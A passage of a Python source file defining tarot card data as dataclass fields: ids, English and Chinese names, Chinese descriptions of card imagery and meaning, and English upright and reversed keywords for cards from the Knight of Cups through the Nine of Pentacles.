clouds', reversed='Emotional immaturity, Insecurity, Disappointment, Emotional vulnerability, Immaturity, Neglecting inner child, Escapism' ), init=False) knight_of_cups: TarotCard = field(default=TarotCard( id=47, index='knight_of_cups', type='minor_arcana', orig_name='Knight of Cups', name='圣杯骑士', intro='不同于权杖骑士或宝剑骑士的迅捷骑马姿态,圣杯骑士的白马很有绅士风度,优雅地行进,跟主人一样。圣杯骑士平举着圣杯,他的眼光有些梦幻,深深注视着圣杯。', words='选择', desc='圣杯骑士意味在感情和行动之间做出决定。\n\n圣杯骑士暗示来自某人的供给。它可能是指情感上的奉献,或某种更为实际的事物。它可能是指情感上的付出,或某种更为实际的事物。骑士也意味着一段决定是否等待或行动,让事情充分发展或找寻新机会的时期。为了发现满足,或许现在是随着心意(河流的象征)而为的时候了。', upright='Following the heart, Idealist, Romantic, Charming, Artistic, Graceful, Tactful, Diplomatic, Mediator, Negotiator', reversed='Moodiness, Disappointment, Tantrums, Turmoil, Avoiding conflict, Vanity' ), init=False) queen_of_cups: TarotCard = field(default=TarotCard( id=48, index='queen_of_cups', type='minor_arcana', orig_name='Queen of Cups', name='圣杯皇后', intro='圣杯皇后双手捧着圣杯,眼神直直的注视着圣杯。那圣杯是教堂形状,两臂各有一位天使,顶端是十字架,象征圣杯皇后的虔诚。她坐在海边的宝座上,宝座基部有个小美人鱼抓鱼的图案,顶部是两个小美人鱼共同抱着一个大蚌壳。', words='倾听', desc='圣杯皇后意味透过倾听直觉而成功。\n\n圣杯皇后意味透过倾听感觉,以及利用富创意的想象力而获得成功。她从经验得知,杂乱无章的想象所产生的结果通常是有限的,因此它可以将精力用在对身体、情感、精神及心灵上都相当有价值的行动上。虽然她可能显得温柔又细心,但眼神却意味着一种坚强的意志。爱调和她的意志,并增加个性上的深度。她带着爱心和怜悯行事,而且常常展现出浓浓的家庭感情。如果发生问题,她可能不会说出她的感觉,但仍然会对周遭的人给于支持,把自己的感情的困扰放在一边。', upright='Compassion, Calm, Comfort, Warmth, Kindness, Intuition, Healer, Counsellor, Supportive', reversed='Martyrdom, Insecurity, Dependence, Giving too much, Overly-sensitive, Needy, Fragile' ), init=False) king_of_cups: TarotCard = field(default=TarotCard( id=49, index='king_of_cups', type='minor_arcana', orig_name='King of Cups', name='圣杯国王', intro='国王坐在波涛汹涌海中央的宝座上,左边有条鱼跳出海面,右边有一艘帆船。他的内袍是代表水要素的蓝色,胸前还挂著鱼形项链。他左手拿著象征权力的杖,右手持圣杯,他却是圣杯家族中唯一不注视圣杯的人。', words='创作', desc='圣杯国王暗示透过创造和情感上的训练而成功。\n\n圣杯国王展现深度和理解力,他适合一个以满足他人的需求为主的位置。他感情已经成熟到能够清楚的考虑别人和自己的需求,而且常常以家庭及环境中的共同参与感为荣。\n\n圣杯国王暗示透过情感和创作上的训练而成功,经由落实精力在有创作的目标上,可以达到所追寻的成功。一种成熟、有创意的方法带来琛功,尤其是在创造和艺术的努力上。这张国王牌暗示你应该信赖你本能——别放弃。它暗示一种坚强又冷静的方式。想象加灵感,再加上实际的努力就会得到回报。', upright='Compassion, Control, Balance, Wise, Diplomatic, Balance between head and heart, Devoted, Advisor, Counsellor', reversed='Coldness, Moodiness, Bad advice, Overwhelmed, Anxious, Cold, Repressed, Withdrawn, Manipulative, Selfish' ), init=False) ace_of_swords: TarotCard = field(default=TarotCard( id=50, index='ace_of_swords', type='minor_arcana', orig_name='Ace of Swords', name='宝剑首牌', intro='一只手从云中伸出,紧紧握住宝剑,宝剑穿过皇冠与桂冠,而远方是毫无绿意的尖锐山头,以及灰白空旷的天际。', words='思想', desc='宝剑首牌代表毅然决然的行动,开始计划一项新的冒险。\n\n宝剑首牌代表的是一个开始,时涉及以相信冒险或方案的行动。权杖首牌描述身体上的行动,杯子牌的首牌则是情感上的行动,而这张首牌叙述一个意念的形成,或是为未来的行动所准备的计划。这张牌代表清晰的思考,或明确的了解到完成一项计划所需要的是什么。\n\n同时这把双面的宝剑强调着现实、成就与成功所必须负担的责任和应得的报酬。宝剑一只是一个开端,一种可能。未来究竟要如何发展,掌握在持剑者的手中。', upright='Breakthrough, Clarity, Sharp mind, New idea, Concentration, Vision, Force, Focus, Truth', reversed='Confusion, Brutality, Chaos, Miscommunication, Hostility, Arguments, Destruction' ), init=False) two_of_swords: TarotCard = field(default=TarotCard( id=51, index='two_of_swords', type='minor_arcana', orig_name='Two of Swords', name='宝剑二', intro='身穿浅灰长袍的女人坐在灰石凳上,背对着澎湃汹涌、暗礁满布的海洋。她眼蒙白布,双手持剑,在胸前交叉不动。天际高挂一轮新月。', words='抉择', desc='宝剑二意味着做出一个决断,无论对与错,不要试图逃避。\n\n宝剑意味为你需要作决定或在两个选择当中择其一。这是二则一的抉择,或许在目前这个阶段,你对于所做的选择会产生怎样的结果,洞察力还不够。你在做决定的时候,并没有对你的环境做通盘的考虑,或者是,你没有考虑到你的抉择会带来怎样的结果。\n\n正视你所恐惧的,如此你才能明了你周遭事物对你有什么意义。一个正确决定的报偿正等着你,它的第一个回报是解脱感,这解脱感来自于你能够锁定一个方向。', upright='Difficult choices, Indecision, Stalemate, Stuck in the middle, Denial, Hidden information', reversed='Lesser of two evils, No right choice, Confusion, Indecision, Hesitancy, Anxiety, Too much information, Truth revealed' ), init=False) three_of_swords: TarotCard = field(default=TarotCard( id=52, index='three_of_swords', type='minor_arcana', orig_name='Three of Swords', name='宝剑三', intro='映入眼帘的是一幅令人痛苦的画面。即使是完全没有接触过塔罗牌的朋友,也可以轻易道出宝剑三的涵义──伤心。三把剑合力刺进一颗鲜红的心,背景是灰暗的雨和云。某些版本的塔罗牌给这张牌一个更直接的名称,叫做“悲伤”。', words='悲伤', desc='宝剑三意味着伤心在所难免,请接受你的痛苦和悲伤。\n\n宝剑三代表的是,你正强烈的经验这悲伤和失落的一段时间。当出现这张牌时,内心的困惑、悲痛和沉重是很明显的,它表示强烈的失望。但你要知道:去体验你的悲伤是很重要的,因为在这么做的同时,你也扫除了障碍,让即将到来的机会可以接近你。记住,悲伤是会过去的。\n\n虽然痛苦,但我们要看破痛苦的假象。宝剑三凌空的心,告诉我们需要再去深入思考,以获得解脱和更深的觉醒,三把宝剑只是一种试炼,这颗心也可以是一种假托,而不是我们真正的心灵。以承受和接纳的态度,来化解宝剑成为优美的思考认知。', upright='Heartbreak, Suffering, Grief, Separation, Sadness, Sorrow, Upset, Loss, Trauma, Tears', reversed='Recovery, Forgiveness, Moving on. healing, Reconciliation, Repressing emotions' ), init=False) four_of_swords: TarotCard = field(default=TarotCard( id=53, index='four_of_swords', type='minor_arcana', orig_name='Four of Swords', name='宝剑四', intro='图中的男人在类似修道院的建筑物内休息,双手合抱胸前,呈现安详的状态。彩绘玻璃表现一个祈祷者跪在圣母面前的画面,好像在寻求什么建议,以获得内心的宁静。三把宝剑挂在墙上不用,但他身旁仍保有一把宝剑,当他醒来,随时可以拿起宝剑来采取行动。', words='沉思', desc='宝剑四暗示在危机中安静的思考,退隐中的深思熟虑。\n\n\n宝剑四这张牌可能象征自生活中撤离:身体上退隐到自家当中,或在精神上退隐到梦想和幻想当中。这是一张反省过去行为和计划未来的牌。他说明精神层面的巩固:采取让过去行为有意义的行动,以及排除那些已经被证实为不正确、或没有建设性的想法和信念。如此一来就有可能运用过去的经验来帮助你获得未来的成功。在经历了宝剑三的痛苦之后,随之而来的是对你自己和你的人生有更深层的了解。', upright='Rest, Restoration, Contemplation, Relaxation, Peace, Sanctuary, Recuperation, Self-protection, Rejuvenation', reversed='Restlessness, Burnout, Stress, Recovery, Awakening, Re-entering world, Release from isolation' ), init=False) five_of_swords: TarotCard = field(default=TarotCard( id=54, index='five_of_swords', type='minor_arcana', orig_name='Five of Swords', name='宝剑五', intro='红发的男子右手抱着两把剑,左手拄着另一把,回头注视远方两个失败者,嘴角似乎带着微笑。很明显的,他们刚结束一场争执,也许暴力相向。地上还散落着两把剑。另外两人中,一人怅然离去,一人用手摀着脸,似乎难以接受,或者感到伤心羞辱。天空中被风吹散的云彷佛也在说着他们争执的故事,看来很不宁静。', words='纷争', desc='宝剑五意味误会加深,争吵和紧张,解决的机会十分渺茫。\n\n宝剑五这张牌代表争吵、紧张和冲突,这可能使指你与自己内在的交战,或和你周遭人的不协调。假如这个冲突是指你和别人的,则其前提很有可能来自你的思想。在这种冲突的情况下,每个人对于事情的解决方法都各有见地,却没有人愿意聆听他人的心声。', upright='Unbridled ambition, Win at all costs, Sneakiness, Arguments, Disputes, Aggression, Bullying, Intimidation, Conflict, Hostility, Stress', reversed='Lingering resentment, Desire to reconcile, Forgiveness, Reconciliation, Resolution, Compromise, Revenge, Regret, Remorse, Cutting losses' ), init=False) six_of_swords: TarotCard = field(default=TarotCard( id=55, index='six_of_swords', type='minor_arcana', orig_name='Six of Swords', name='宝剑六', intro='一艘小船上插着六把宝剑,船上有一个女人、一个小孩与一位船夫。\n\n船缓缓的朝远方的岸边前进,而此端的水汹涌,彼方的水平静。象征伤害的六把剑插在船身上,以及三个主角哀伤的背影,构成宝剑六缓慢低回的基调。沉重的剑身让船夫只能缓行,疗伤的过程亦同。但是我们不能把宝剑抽起,否则船会沉,正如我们不能把过去的哀伤连根拔起,只能轻轻的抚平。也许你该庆幸,这些宝剑并不能使船沉没。', words='平静', desc='宝剑六暗示远离是非,在混乱之后,逐渐回复平静。\n\n这是受伤后康复的过程,不管伤多重,总是能痊愈。水象征情绪,这端汹涌的水是你烦扰的过去,前方大片平静的水面,预示未来安详的情绪。船夫手持黑色长篙,黑色象征潜质,将来什么都还是可能发生,不要将自己困死了。宝剑六是一个信道,领你向未来的幸福快乐前进,光明的日子就在前方。\n\n这张牌暗示你正带着你的剑(问题),从过去走向未来。或许你根本没注意到它们,然而它们却是与你紧紧相随。这是一个从艰困时刻过渡到一个较为平衡状态的过程。即使现时的问题及困难如何复杂,最终都会得到解决,求问者届时心情自然轻松不少。宝剑六可能是在说明当你转移向新的经验时,你也正慢慢的远离困境,情绪从过去释放出来。', upright='Transition, Leaving behind, Moving on, Departure, Distance, Accepting lessons', reversed='Emotional baggage, Unresolved issues, Resisting transition, Stuck in past, Returning to trouble, Running away from problems, Trapped' ), init=False) seven_of_swords: TarotCard = field(default=TarotCard( id=56, index='seven_of_swords', type='minor_arcana', orig_name='Seven of Swords', name='宝剑七', intro='图中的男子身处军营中,趁着远方敌人炊饭没有防备时,悄悄偷走五把剑,还留着两把在原处。', words='逃避', desc='宝剑七意味另辟蹊径,若要成功的话,需要一种新的方法。\n\n宝剑七所传达的讯息是:不要放弃。去找寻另一种可以达成目标的方法吧。坐下来,检查一下你所有的选择,以便发现先前未曾预见的可能性。你当然还有时间来完成你的愿望,然而在方法上需要更有弹性,各种行动的不同组合方式,就有可能会带来不同的结果。\n\n宝剑七暗示经由审慎评估各种可能,你就能找到有效的解决之道。透过详细的规划和不放弃的决心,你就能得到更多。比如你目前正汲汲营营于某件重要的事,理智所提供的解决方案会让你不需要如此费劲。\n\n宝剑七同时也是一张秘密、隐藏动机和不坦诚的牌。牌中暗示求问者欲逃避一段令他不愉快的事情,这件事可能会令他有金钱损失或与面子有关,求问者若肯勇敢面对,并应用智慧及交际手段去补救。', upright='Deception, Trickery, Tactics and strategy, Lies, Scheming, Strategy, Resourcefulness, Sneakiness, Cunning', reversed='Coming clean, Rethinking approach, Deception, Confession, Conscience, Regret, Maliciousness, Truth revealed' ), init=False) eight_of_swords: TarotCard = field(default=TarotCard( id=57, index='eight_of_swords', type='minor_arcana', orig_name='Eight of Swords', name='宝剑八', intro='一个女人眼睛被布蒙住,上半身被捆绑着,身处八把宝剑群中。地上满是象征羞辱的泥泞,而远方是座矗立于峭壁之上的城堡,象征绑住她的权威。', words='限制', desc='宝剑八暗示限制及丧失个人的能力。\n\n宝剑八代表的是你被限制住的一段时间,或是在某种情况下你失去个人的能力。你觉得动弹不得,受到限制,而且没有办法看清楚你前面的路。\n\n塔罗牌的“八”是代表力量的牌。而对于宝剑八里面的女人,这份力量源自于倾听她内在的声音的能力。双眼被蒙蔽让她无法透过视觉来做判断,她显得那么的无能为力,然而第一眼看上去这是个阻碍,但其实却是助力。阻碍那个女人控制自己所处环境的力量,却使得她能够走进自己的内心世界倾听内在的声音,并且留心它所发出的指令。如果你想做出有效率的决定,现在是留心你的自我精神层次的时候了。\n\n去探索那等待着你的道路吧,利用你内在的力量和个人的能力,将自己从目前的情况中释放出来,并且把那些曾经屈服于他人的个人能量重新召唤回来。你的信念其实才是你最大的限制。好好自省并检视这些信念,因为事实上目前的“眼罩”是在帮助你,因为它可以让你不会分心。', upright='Imprisonment, Entrapment, Self-victimization, Trapped, Restricted, Victimised, Paralysed, Helpless, Powerless', reversed='Self acceptance, New perspective, Freedom, Release, Taking control, Survivor, Facing fears, Empowered, Surrender' ), init=False) nine_of_swords: TarotCard = field(default=TarotCard( id=58, index='nine_of_swords', type='minor_arcana', orig_name='Nine of Swords', name='宝剑九', intro='午夜梦回,一个女子从睡梦中惊醒,把脸埋在双手中。墙上横挂着九把剑,看起来彷佛从后面刺穿那女子,带给人极大的压迫感。棉被图案是由象征热情的玫瑰,以及星座符号组成的。床侧则雕刻着一人击败另一人的画面。', words='梦魇', desc='宝剑九暗示由梦境传达的直觉,或对问题的担心。\n\n宝剑九代表的是强烈的梦。或许你的潜意识正努力教导你某些事情,去倾听你的梦境。宝剑九是一张代表担心和情绪骚动的牌。这种担心可能是对自己或周遭的一切。也可以代表鲜明的梦境或梦魇,而梦魇则可能是在传达一种强烈的讯息,即你生命当中某些不对劲的事物,已由潜意识而浮现在你的意识层面了。\n\n假设你将你的梦境写成日志,或许会发现一个共同的线索或是明显的讯息。那么你的梦就可以变成一项接近你潜意识的有效工具了。', upright='Anxiety, Hopelessness, Trauma, Fear, Negativity, Breaking point, Despair, Nightmares, Isolation', reversed='Hope, Reaching out, Despair, Recovery, Learning to cope, Facing life, Finding help, Shame, Guilt, Mental health issues' ), init=False) ten_of_swords: TarotCard = field(default=TarotCard( id=59, index='ten_of_swords', type='minor_arcana', orig_name='Ten of Swords', name='宝剑十', intro='一个俯卧的男人,背上插着十把剑,有一把甚至从插进耳朵里去。这画面实在令人怵目惊心。牌面中有一半被黑色的天空和乌云所占去,多少暗示宝剑十这张牌是大家避之唯恐不及的所谓的“坏牌”。', words='失败', desc='宝剑十意味着痛苦挥之不去,在另一个开始之前某种状况的结束。\n\n这张牌暗示在某种情况下,你已到了最低潮的时刻,你也可能是被一些无用的事物,或对生命具破坏性的信念给绊住了。但远方微弱的阳光暗示着,尾随这艰困时刻的将会是新的以及更好的事物。你对人生的思想或信念导致你此刻的境遇,从这里,你的思想将会带领你到任何你认为能够去的地方。\n\n宝剑十代表一种情况的结束。可能指两性关系的结束,或某关系中的一个阶段的结束,或一项事业的失败。你生命中的某些事物已经结束了,虽然这毫无疑问的会是一段艰难的时期,不过好消息是,它终究会过去,接受这个事实有助于新事物来取代旧的的。', upright='Failure, Collapse, Defeat, Ruin, Bitterness, Exhaustion, Dead end, Victimization, Betrayal', reversed="Can't get worse, Only upwards, Inevitable end, Survival, Improvement, Healing, Lessons learned, Despair, Relapse" ), init=False) page_of_swords: TarotCard = field(default=TarotCard( id=60, index='page_of_swords', type='minor_arcana', orig_name='Page of Swords', name='宝剑侍从', intro='宝剑侍从两手握著宝剑,眼光却朝著远方。他的头发和背景中的树都被风吹得飞扬。远方天空中有十只小鸟成群飞舞。背景灰云带来些许混乱的气氛', words='幻想', desc='宝剑侍从象征太多的梦想,而行动却不够。\n\n你可以发现到这个侍从双脚离地甚远,这个思考敏捷的年轻人喜欢说话、有很多点子和创新的概念,而这些成双出现的点子却无法搭在一起。这表示一种生活的态度,这种态度要求你透过梦境和思想让自己从现实抽离出来。\n\n宝剑侍从可能代表有关你目前所拥有的一个构想或计划的消息。但却没有付诸行动。对那些依赖创意和思考维生的人而言,这可说是一张正面的牌,但是也可能暗示脚踏实地是必要的,假设你想生产实际或有形的东西。', upright='Curiosity, Restlessness, Mental energy, Curious, Witty, Chatty, Communicative, Inspired, Vigilant, Alert, Mental agility', reversed='Deception, Manipulation, All talk, Scatterbrained, Cynical, Sarcastic, Gossipy, Insulting, Rude, Lack of planning' ), init=False) knight_of_swords: TarotCard = field(default=TarotCard( id=61, index='knight_of_swords', type='minor_arcana', orig_name='Knight of Swords', name='宝剑骑士', intro='宝剑骑士和圣杯骑士同样骑着白马,但宝剑骑士这匹马在狂风中极速奔驰,与圣杯骑士平缓前进的马形成强烈对比。宝剑骑士将宝剑高举过头,表情狰狞,向前冲杀。马鞍上饰以蝴蝶和鸟,象征风要素。他穿着铁甲,外袍也有鸟的图案,而靴子前后都带着尖刺,在战场上毫不留情。云和树都被狂风吹得七零八落。空中飞翔的鸟,队形也略显散乱。', words='急躁', desc='宝剑骑士暗示要达成愿望需要有敏捷的行动。\n\n宝剑骑士代表的是迅速的行动:跃进或跳出某种情景。作为某个问题的答案,它暗示着一个快速的动作或出其不意的行为是有需要的。已经没有时间去想该做何选择了——去做就对了。\n\n这张牌通常是代表一个年轻人,他不按牌理出牌、缺少耐心、思考敏捷。这是属于年轻人的力量,他要走往自己的道路。是一种英勇的行径或者说英雄气概的展现。当然这种冲撞的行动,也可能极具破坏力,能造成摧毁的状况。他的意志力坚强,专注而犀利,有着清明的勇气和专一凝聚的心志。', upright='Action, Impulsiveness, Defending beliefs, Assertive, Direct, Impatient, Intellectual, Daring, Focused, Perfectionist, Ambitious', reversed='No direction, Disregard for consequences, Unpredictability, Rude, Tactless, Forceful, Bully, Aggressive, Vicious, Ruthless, Arrogant' ), init=False) queen_of_swords: TarotCard = field(default=TarotCard( id=62, index='queen_of_swords', type='minor_arcana', orig_name='Queen of Swords', name='宝剑皇后', intro='宝剑皇后戴著蝴蝶花纹的王冠,象征灵魂,也象征风要素。她穿着灰色内袍,和蓝天灰云花纹的披风。她的表情坚毅,似乎皱著眉头,左手却对世界敞开。她右手高举宝剑,剑尖笔直向上。她的宝座扶手之下有个人头花纹,那是风之精灵,宝座的底部又有蝴蝶花纹。宝剑皇后的头顶上有只高飞的鸟。背景天空是深蓝色的,还有大片的灰云。', words='理智', desc='宝剑皇后代表淡定冷静,经过深思熟虑所得到的成就。\n\n宝剑皇后是一张思索感情的牌。它可能意味运用心智到情感中的行动,好让感觉有意义。作为某个问题的答案,宝剑皇后暗示透过清晰思考而获致成功。\n\n现在正是你反省过去的行为或目前情况的时刻了。密切的观察那些接近你的事物,以确认你不会再重陷困境中。你可能会想从生活当中撤退,好好的思考你自己,以及未来的方向。', upright='Complexity, Perceptiveness, Clear mindedness, Honest, Independent, Principled, Fair, Constructive criticism, Objective, Perceptive', reversed='Cold hearted, Cruel, Bitterness, Pessimistic, Malicious, Manipulative, Harsh, Bitter, Spiteful, Deceitful, Unforgiving' ), init=False) king_of_swords: TarotCard = field(default=TarotCard( id=63, index='king_of_swords', type='minor_arcana', orig_name='King of Swords', name='宝剑国王', intro='宝剑国王是四张国王牌中唯一以正面出现的。他穿著蓝色内袍和红色披风,他的右手持剑,剑尖偏右,偏向行动的那一边。左手戴着象征权力的戒指,轻松的放在腿上。他后方帷幕上饰有象征灵魂和风要素的蝴蝶花纹。天空中的鸟的数量有两只,象征在智慧与行动之间的选择,对宝剑国王而言,智慧必须用行动来实现。', words='公正', desc='宝剑国王暗示将梦想化为现实,用构想去做一些真实的事。\n\n宝剑国王是客观理性,凡事讲求合理和公正,具有坚定而一贯的信念和完整的思想体系,很难被他人所影响。他凭借事实和原则而下决定,不会情感用事或主观成见,并且会考虑得十分周到,显出谨慎和深沉的特色。\n\n宝剑象征着人的思想和决心,这位国王手执宝剑,自然具有着掌握思考的能力,并且很重视理念和原则,在意的是合理与正义。宝剑国王代表对清楚的思想的追求、诚实,以及将只是倒入现实的需求。作为某个问题的答案,这张国王牌可以说是透过清楚而有效之计划而达到成功。', upright='Head over heart, Discipline, Truth, Reason, Authority, Integrity, Morality, Serious, High standards, Strict', reversed='Manipulative, Cruel, Weakness, Irrational, Dictator, Oppressive, Inhumane, Controlling, Cold, Ruthless, Dishonest' ), init=False) ace_of_pentacles: TarotCard = field(default=TarotCard( id=64, index='ace_of_pentacles', type='minor_arcana', orig_name='Ace of Pentacles', name='星币首牌', intro='云中伸出一只手,捧着一枚星币。背景是花草满布的繁盛庭园,绿树拱门外的远方有座白色的山,暗示星币一不只有关物质,也可以延伸到精神层面。', words='物质', desc='星币首牌暗示,你有足够的钱好执行你的计划。\n\n星币首牌是张将梦想化为实质的牌。圣杯牌组中,我们有梦﹔星币牌组中,我们筑梦,梦想不再只是空中楼阁。星币首牌让我们稳健,踏实,有安全感。星币首牌和务实的开始有关。它意味你有足够的金钱、精力,或充分的条件,来开始一项新计划。它暗示你可以平衡掉花费。不论目前花掉了多少钱,赚回来的绝对够本。', upright='Opportunity, Prosperity, New venture, New opportunities, Resources, Abundance, Security, Stability, Manifestation', reversed='Lost opportunity, Missed chance, Bad investment, Missed chances, Scarcity, Deficiency, Instability, Stinginess, Bad investments' ), init=False) two_of_pentacles: TarotCard = field(default=TarotCard( id=65, index='two_of_pentacles', type='minor_arcana', orig_name='Two of Pentacles', name='星币二', intro='一个红衣装扮,头戴高帽,类似街头艺人的男子,正在耍弄两个星币,星币外围的带子形成8自形无限符号,魔术师和力量牌中也有这个符号。他背后的海面起伏剧烈,两艘船正在其上行驶。', words='两难', desc='星币二暗示与金钱有关的决定。\n\n星币二显示一个专注于钱财的人。此时他并没有重大的财务压力,只是要决定那张账单要先付而已。保持弹性,是星币二带给我们的另一个课题。除了随机应变的弹性,星币二也求取平衡。\n\n星币二描述着权衡各种机会的轻重,而这次它们是属于身体或物质的层面上。这象征着介于两个选择之间的决定。你有没有办法现在就抉择,或是再等一会儿会不会比较好呢?', upright='Balancing decisions, Priorities, Adapting to change, Balancing resources, Adaptation, Resourcefulness, Flexibility, Stretching resources', reversed='Loss of balance, Disorganized, Overwhelmed, Imbalance, Unorganized, Messiness, Chaos, Overextending' ), init=False) three_of_pentacles: TarotCard = field(default=TarotCard( id=66, index='three_of_pentacles', type='minor_arcana', orig_name='Three of Pentacles', name='星币三', intro='在一座修道院里头,有位雕刻师正在工作,旁边两位修道人拿着草图,似乎正在和雕刻师讨论工作的进度。', words='学习', desc='星币三暗示透过研究、学习,或者将构想付诸实现,而改善自身的境遇。\n\n这张牌代表扎根于稳固的基础上,建立某些具有持久价值的东西。也许你是在建造一栋房子,开始学习一个对你有助益的课程,或为稳固的两性关系或生意打基础。星币三对自我发展而言是张正面的牌。星币三表示去作某些将可以改善你环境事情的一段时间。它可能是开始一个课程、阅读书籍,或如果它是出现在事业的分析中,那就是你在工作当中学习拥有一个机会去建立某种具有永久价值的东西。\n\n星币三是一个鼓励,鼓励当事人不管在进行什么样的工作,都可以仔细计划,然后放手去做,因为他具备完成工作所需要的专业能力,他有充足的才干来达成手边任何任务。星币三的成功不是偶然,他不仅有专业能力,还实实在在的工作。', upright='Teamwork, Collaboration, Building, Shared goals, Apprenticeship, Effort, Pooling energy', reversed='Lack of teamwork, Disorganized, Group conflict, Lack of cohesion, Apathy, Poor motivation, Conflict, Ego, Competition' ), init=False) four_of_pentacles: TarotCard = field(default=TarotCard( id=67, index='four_of_pentacles', type='minor_arcana', orig_name='Four of Pentacles', name='星币四', intro='图中的男人戴着皇冠,身穿象征统治威权的红色袍子,下摆饰以蓝边,显示出崇高的领主身分。他坐在一个箱子上,头顶一枚星币,双手紧抓着另一枚,双脚又各踩着两枚,紧张的神情似乎深怕他失去任何一丁点财产。这个人虽有钱,却孤绝于城市人群之外。', words='节约', desc='星币四意味厚积薄发,节省你的金钱或体能以迎接更大的挑战。\n\n星币四正位置常代表物质上的获利与稳定,获利的来源可能是工作,也可能是接受赠与或遗产。然而,星币四代表物质上的稳定,却不保证心灵上的成长。星币四意味你正在节约金钱、节省精力,或是节制。它也可能意味经由节约金钱、偿还债务及量入为出,而是你的财务状况日趋稳定。或许你在设计增加收入或减少指出,以确保自己进来的钱比出去的多。', upright='Conservation, Frugality, Security, Possessiveness, Insecurity, Hoarding, Stinginess, Stability, Savings, Materialism, Wealth, Boundaries, Guardedness', reversed='Greediness, Stinginess, Possessiveness, Generosity, Giving, Spending, Openness, Financial insecurity, Reckless spending' ), init=False) five_of_pentacles: TarotCard = field(default=TarotCard( id=68, index='five_of_pentacles', type='minor_arcana', orig_name='Five of Pentacles', name='星币五', intro='冰天雪地中,两个乞丐蹒跚前行,又瘸又驼背,身上的衣服破烂不堪。他们经过一间象征物质与精神庇护的教堂,却视而不见,挺着饥饿且疲惫的身躯,径自赶路。', words='困难', desc='星币五意味对那些充实你的事物的疏离感。\n\n卡面上的两个人本可以选择如何去发现、跟随及落实精神之路。教堂其实只是他们的一种选择。它代表把精神价值介绍给那些无意去追求的人。在五这张牌中,这些人没有看见它,因此丧失了一个改变的机会。外在悲惨是内在悲惨的一种反映,所以当星币五出现时,你需要接受生命提供给你的改变机会。“如果你想改变这个世界,请先改变你自己”是这张牌的答案。\n\n就整体观点来看,星币五说的是财务上的困难、贫穷、疾病和内在的寂寞。在不断的挣扎当中,你很容易窄化你对问题的焦点,而忽略了你的机会。当这张五出现时,深度的心灵改变是有其需要的,否则虽然有外在的助力,可能还是解决不了你的问题。你目前的人生观并非你的支柱,而现在你必须问自己,是否仍愿意保有这些信念。', upright='Need, Poverty, Insecurity, Hardship, Loss, Isolation, Feeling abandoned, Adversity, Struggle, Unemployment, Alienation, Disgrace', reversed='Recovery, Charity, Improvement, Positive changes, Recovery from loss, Overcoming adversity, Forgiveness, Feeling welcomed' ), init=False) six_of_pentacles: TarotCard = field(default=TarotCard( id=69, index='six_of_pentacles', type='minor_arcana', orig_name='Six of Pentacles', name='星币六', intro='一个商人装扮的男子,脚边跪着两个乞丐。商人右手施舍其中一名乞丐,左手拿着象征平衡的天秤。', words='施舍', desc='星币六暗示没有绝对的公平,其中一人比另一人更有控制力。\n\n星币六是在形容一种结构性的关系,其中一人比另一人更有控制力。是一张有很多层面的牌,而它的意义又会随着问题或周遭的牌而改变,在这张牌中,看似公平和正当,不过,请注意,两个乞丐是跪在富翁的面前。在这个关系里,他是处于有权力的地位。星币六是在形容一种关系:一个人支配另外一个人。\n\n跪在地上的人事实上是受制于他的,暗示着局面是由他所控制,而他是透过他的财富来掌控这一切。这个站着的人深谙拥有金钱就是拥有权力。他就越能选择自己的人生。施与受中间不只是金钱,知识、经验、技术的传授也算。所以星币六也代表知识、经验、技术的传授或是学习。', upright='Charity, Generosity, Sharing, Community, Material help, Support, Giving and receiving, Gratitude', reversed='Strings attached, Stinginess, Power and domination, Power dynamics, Abuse of generosity, Strings attached gifts, Inequality, Extortion' ), init=False) seven_of_pentacles: TarotCard = field(default=TarotCard( id=70, index='seven_of_pentacles', type='minor_arcana', orig_name='Seven of Pentacles', name='星币七', intro='一位农夫把下巴架在杖上,低头看着他长久辛勤得来的收成。这丛农作物在他的耕耘下,已经可以自己成长茁壮了。农夫的表情似乎很满足,又彷佛在思考下一步该怎么做。', words='规划', desc='星币七意味着思考未来的财务或物质状况。\n\n星币七暗示目前工作即将完结,只剩下一点尾巴要收而已。经历过去长时间段孜孜不倦的努力,现在可以暂停一下,看看自己目前的成就,想想下一步的行止。星币七是一种实际面上的投资与等待,并且具有时间性,能解释出过去和未来的现象。代表过去曾经付出努力,投注了资源和精神,如今正在等待成果,未来也将有机运得到这些回收。处于一种回顾和期待的状态。\n\n星币七代表思考和计划未来的一段时间。你的生活或目前的状况尚称平稳,所以你有时间可以安静的计划未来的步骤。这可能包括进一步的学习、强调休闲、谨慎地经营现有财物,甚至再创另一种事业,以补充现有的事业。花些时间多做思考吧,因为你的决定有可能对将来产生很大的影响。', upright='Hard work, Perseverance, Diligence, Harvest, Rewards, Results, Growth, Progress, Patience, Planning', reversed='Work without results, Distractions, Lack of rewards, Unfinished work, Procrastination, Low effort, Waste, Lack of growth, Setbacks, Impatience, Lack of reward' ), init=False) eight_of_pentacles: TarotCard = field(default=TarotCard( id=71, index='eight_of_pentacles', type='minor_arcana', orig_name='Eight of Pentacles', name='星币八', intro='一位雕刻匠坐在长板凳上,专注而勤劳地刻着星币星币,他前面已经完成六个了,脚边还有一个未完成。有一条黄色的道路连接远方的市镇与雕刻匠,连接工作与社会,无论什么工作,目的都是服务人群,雕刻匠并未忘记这一点。', words='上进', desc='星币八暗示对某人或某种状况的承诺。\n\n星币八是代表工作赚钱的一张牌,也表示能够累积财富,集中心力在赚取金钱上。这是一张代表承诺并专注于眼前工作的牌,而意念当中这乃是为了较长的目标而努力。\n\n星币八暗示对一个人或一种状况的深度承诺。现在你则着重于你的技巧以及如何变得更精炼。可以透过不懈的努力,或进一步的学习让技艺更上层楼。这张牌时说你已经在群体当中找到了自己的位置,并且在做适合你做的事情。你明白工作不应该是沉闷无味的,而是一种自我完成的机会。工作不仅只是为了填满你时间、胃或口袋,更重要的是让你的人生完整。', upright='Apprenticeship, Passion, High standards, Skill, Talent, Craftsmanship, Quality, Expertise, Mastery, Commitment, Dedication, Accomplishment', reversed='Lack of passion, Uninspired, No motivation, Lack of quality, Rushed job, Bad reputation, Lack of motivation, Mediocrity, Laziness, Low skill, Dead-end job' ), init=False) nine_of_pentacles: TarotCard = field(default=TarotCard( id=72, index='nine_of_pentacles', type='minor_arcana', orig_name='Nine of Pentacles', name='星币九', intro='一位衣着华丽的女子站在她的庄园中,四周葡萄茂盛,正是收成时节。她右手扶在星币上,大拇指还扣着一根葡萄藤,左手则戴着白手套,让她的小鸟站在上面,小鸟的头部却被红布遮住了。', words='自律', 